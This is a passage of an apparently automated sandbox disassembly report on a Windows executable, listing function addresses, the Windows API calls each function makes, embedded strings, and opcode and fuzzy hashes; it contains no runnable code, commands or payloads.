                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0096F6B5
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096F848
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096F86C
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096F8AC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096F8CE
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096FA4A
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0096FA7C
                                                                  • CloseHandle.KERNEL32(?), ref: 0096FAAB
                                                                  • CloseHandle.KERNEL32(?), ref: 0096FB22
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                  • String ID:
                                                                  • API String ID: 4090791747-0
                                                                  • Opcode ID: d17dede3de110fb654e997765af5e64e20318e28147b065b07298079aba180b8
                                                                  • Instruction ID: 87e007d93bd785df7bdf32afcf7ba2d568abdd04b695bd50cfc516463d32818e
                                                                  • Opcode Fuzzy Hash: d17dede3de110fb654e997765af5e64e20318e28147b065b07298079aba180b8
                                                                  • Instruction Fuzzy Hash: A8E1BD316042049FCB14EF34D8A1B6ABBE5FF85354F14896DF8999B2A2CB31DC45CB52
                                                                  Function 00954CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00953697,?), ref: 0095468B
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00953697,?), ref: 009546A4
                                                                    • Part of subcall function 00954A31: GetFileAttributesW.KERNEL32(?,0095370B), ref: 00954A32
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00954D40
                                                                  • _wcscmp.LIBCMT ref: 00954D5A
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00954D75
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: b1422b4e8a1296351b569dab956f62d3b690b538c70ee5a1ed63c918231d3b7a
                                                                  • Instruction ID: 265836493e2c8589aa5cd5dd18b5a74ee48ed8417339ecad572092cf364d9ee4
                                                                  • Opcode Fuzzy Hash: b1422b4e8a1296351b569dab956f62d3b690b538c70ee5a1ed63c918231d3b7a
                                                                  • Instruction Fuzzy Hash: 785163B21083459BC764EBA5D881ADFB3ECAF84355F40092EF689D3191EE34A5CCC766
                                                                  Function 00978645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009786FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: e88c44c90a4fe4d6fb86276e21e91e2a876efa7d05bf5ad548f88332bed7bbb3
                                                                  • Instruction ID: 73cca1f0973f2bf20d568ee2cb805df52021f972eb6085ce60184eaffcb55c4f
                                                                  • Opcode Fuzzy Hash: e88c44c90a4fe4d6fb86276e21e91e2a876efa7d05bf5ad548f88332bed7bbb3
                                                                  • Instruction Fuzzy Hash: B051B532684244BEDB249B28CC8DFAE7B68FB05720F608615F91DE61A1CF75A980DB51
                                                                  Function 008F2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0092C2F7
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0092C319
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0092C331
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0092C34F
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0092C370
                                                                  • DestroyIcon.USER32(00000000), ref: 0092C37F
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0092C39C
                                                                  • DestroyIcon.USER32(?), ref: 0092C3AB
                                                                    • Part of subcall function 0097A4AF: DeleteObject.GDI32(00000000), ref: 0097A4E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 2819616528-0
                                                                  • Opcode ID: ec185eb3f271408f2a29a82fdef8a9de11b1091aea1a77b73f462d5576ccdf30
                                                                  • Instruction ID: ab6a662f6f3e99a3fa755fc6976132b2b367603ab801f4b8a901ff51133f7390
                                                                  • Opcode Fuzzy Hash: ec185eb3f271408f2a29a82fdef8a9de11b1091aea1a77b73f462d5576ccdf30
                                                                  • Instruction Fuzzy Hash: BC516971610209EFDB24DF65DC45BAE37A9FB48720F104628FA06E72A0DB70AD90EB50
                                                                  Function 0094966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0094A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0094A84C
                                                                    • Part of subcall function 0094A82C: GetCurrentThreadId.KERNEL32 ref: 0094A853
                                                                    • Part of subcall function 0094A82C: AttachThreadInput.USER32(00000000,?,00949683,?,00000001), ref: 0094A85A
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0094968E
                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009496AB
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009496AE
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 009496B7
                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009496D5
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009496D8
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 009496E1
                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009496F8
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009496FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                  • String ID:
                                                                  • API String ID: 2014098862-0
                                                                  • Opcode ID: 9d8ec049aed6627aba13e1b2acdc423887ee72eb386854b1cb24cc079e4092ba
                                                                  • Instruction ID: f0fe3f5674a3551471bc2b217a4d4eaa87bebfa494ccc7fed5a2fca8f3db71f5
                                                                  • Opcode Fuzzy Hash: 9d8ec049aed6627aba13e1b2acdc423887ee72eb386854b1cb24cc079e4092ba
                                                                  • Instruction Fuzzy Hash: 0511E572964218BEF7106F60DC49F6A3B1DDB8C760F510425F248AB1A0C9F25C50EAB4
                                                                  Function 00948921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0094853C,00000B00,?,?), ref: 0094892A
                                                                  • HeapAlloc.KERNEL32(00000000,?,0094853C,00000B00,?,?), ref: 00948931
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0094853C,00000B00,?,?), ref: 00948946
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,0094853C,00000B00,?,?), ref: 0094894E
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0094853C,00000B00,?,?), ref: 00948951
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0094853C,00000B00,?,?), ref: 00948961
                                                                  • GetCurrentProcess.KERNEL32(0094853C,00000000,?,0094853C,00000B00,?,?), ref: 00948969
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0094853C,00000B00,?,?), ref: 0094896C
                                                                  • CreateThread.KERNEL32(00000000,00000000,00948992,00000000,00000000,00000000), ref: 00948986
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: 26b129d583963b4514c909fdaa20488123c3485e7c411c0b06dc4d4f44df9506
                                                                  • Instruction ID: 580bc244ecbdf7ee7a9f4d6969f8e8b761199f4498887505f8fe8fc1eb1a9705
                                                                  • Opcode Fuzzy Hash: 26b129d583963b4514c909fdaa20488123c3485e7c411c0b06dc4d4f44df9506
                                                                  • Instruction Fuzzy Hash: 6101BF76258704FFE710ABA5DC4DF6B3B6CEB89711F404421FA09DB291CA709840DB30
                                                                  Function 00969B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: 641f54a744a4bf2c1d74e6ff7b7334702a93c15080de7ba93043c4593d503b7e
                                                                  • Instruction ID: adb48224ed4d907a80b6ebe6692a0096d927b963857bb9895c375b50a0f0acff
                                                                  • Opcode Fuzzy Hash: 641f54a744a4bf2c1d74e6ff7b7334702a93c15080de7ba93043c4593d503b7e
                                                                  • Instruction Fuzzy Hash: BDC19371A0021A9FDF10DFA8D984BAEB7FDFB88314F148469E909A7280E7719D45CB90
                                                                  Function 00969113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$_memset
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                  • API String ID: 2862541840-625585964
                                                                  • Opcode ID: e998c47bcf613b64c8497cfe8108c25a332b2a53e1716c4bfba0cda6294b19e5
                                                                  • Instruction ID: 62b605a62351ae0eb96ec6a73b0944170e2e2d593257dd2a25c994d35f9b5e9e
                                                                  • Opcode Fuzzy Hash: e998c47bcf613b64c8497cfe8108c25a332b2a53e1716c4bfba0cda6294b19e5
                                                                  • Instruction Fuzzy Hash: 74918B71A00219EBDF24DFA5C848FAFBBBCEF85714F10855AF915AB280D7709945CBA0
                                                                  Function 0096975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0094710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?,?,00947455), ref: 00947127
                                                                    • Part of subcall function 0094710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947142
                                                                    • Part of subcall function 0094710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947150
                                                                    • Part of subcall function 0094710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?), ref: 00947160
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00969806
                                                                  • _memset.LIBCMT ref: 00969813
                                                                  • _memset.LIBCMT ref: 00969956
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00969982
                                                                  • CoTaskMemFree.OLE32(?), ref: 0096998D
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 009699DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 1300414916-2785691316
                                                                  • Opcode ID: 1d67cee725dcb7213d2affb4b5525fef4e16a12e57bf771c7009084c74bacc71
                                                                  • Instruction ID: 1158a4dac85dc4e28a197f31b4639eea65933d8bfc72bf336fec03ef809cb225
                                                                  • Opcode Fuzzy Hash: 1d67cee725dcb7213d2affb4b5525fef4e16a12e57bf771c7009084c74bacc71
                                                                  • Instruction Fuzzy Hash: 91912671D0021CEBDB10DFA5DC41EEEBBB9FF48350F20415AE519A7291EB719A44CBA1
                                                                  Function 00976D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00976E24
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00976E38
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00976E52
                                                                  • _wcscat.LIBCMT ref: 00976EAD
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00976EC4
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00976EF2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  • Opcode ID: 81b55f03ee554b1480e2430d073bf91be8534ac9beb1c13f3e0eabfa844eec77
                                                                  • Instruction ID: 732abb422ea5178a310e8103e5370bb1643873ce8c4790800b0aa691636e72ba
                                                                  • Opcode Fuzzy Hash: 81b55f03ee554b1480e2430d073bf91be8534ac9beb1c13f3e0eabfa844eec77
                                                                  • Instruction Fuzzy Hash: 8741B172A00308AFEB219F64CC85BEE77F8EF48754F10446AF588E7191D6719D948B60
                                                                  Function 0096E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00953C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00953C7A
                                                                    • Part of subcall function 00953C55: Process32FirstW.KERNEL32(00000000,?), ref: 00953C88
                                                                    • Part of subcall function 00953C55: CloseHandle.KERNEL32(00000000), ref: 00953D52
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096E9A4
                                                                  • GetLastError.KERNEL32 ref: 0096E9B7
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096E9E6
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0096EA63
                                                                  • GetLastError.KERNEL32(00000000), ref: 0096EA6E
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0096EAA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: 8c2f52b8396a4abb339cfdb60dc97738012662246bc95ad6c0854bb4cb5761b8
                                                                  • Instruction ID: 9fe67c1f3c9822a49edacf44564ad06692c8143be10bc10a30f336af60c89824
                                                                  • Opcode Fuzzy Hash: 8c2f52b8396a4abb339cfdb60dc97738012662246bc95ad6c0854bb4cb5761b8
                                                                  • Instruction Fuzzy Hash: A641A9712042009FDB10EF68CCA5F7EB7A5BF84354F088469F9469B2D2DB75A944CF92
                                                                  Function 00952F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00953033
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: 87ef880b5be613c366417bad478e95f6712838fb645e33d633f759d0518a2c45
                                                                  • Instruction ID: 507d5b9c079897a80fd0efce2963c7adceb0c2bb36ae27e6aea1143200b1de8f
                                                                  • Opcode Fuzzy Hash: 87ef880b5be613c366417bad478e95f6712838fb645e33d633f759d0518a2c45
                                                                  • Instruction Fuzzy Hash: 89116A3274834ABEE715DB26DC42DAB779CDF163A5B20402AFD00A61C1EB755F8857A0
                                                                  Function 009542F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00954312
                                                                  • LoadStringW.USER32(00000000), ref: 00954319
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0095432F
                                                                  • LoadStringW.USER32(00000000), ref: 00954336
                                                                  • _wprintf.LIBCMT ref: 0095435C
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0095437A
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00954357
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: 97800186192c5b6a0acf3a7d23adc756d67a8b114bd6837e12aa0f5b9df720f9
                                                                  • Instruction ID: b745d9fdb56363465141c9896fc35413d57c31ca42cf121e7d14f3d1fc547302
                                                                  • Opcode Fuzzy Hash: 97800186192c5b6a0acf3a7d23adc756d67a8b114bd6837e12aa0f5b9df720f9
                                                                  • Instruction Fuzzy Hash: 7A018BF390820CBFE750ABA0DD89EEA736CEB08301F4004A5BB49E2011EA349EC44B70
                                                                  Function 0097D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0097D47C
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0097D49C
                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0097D6D7
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0097D6F5
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0097D716
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 0097D735
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0097D75A
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0097D77D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
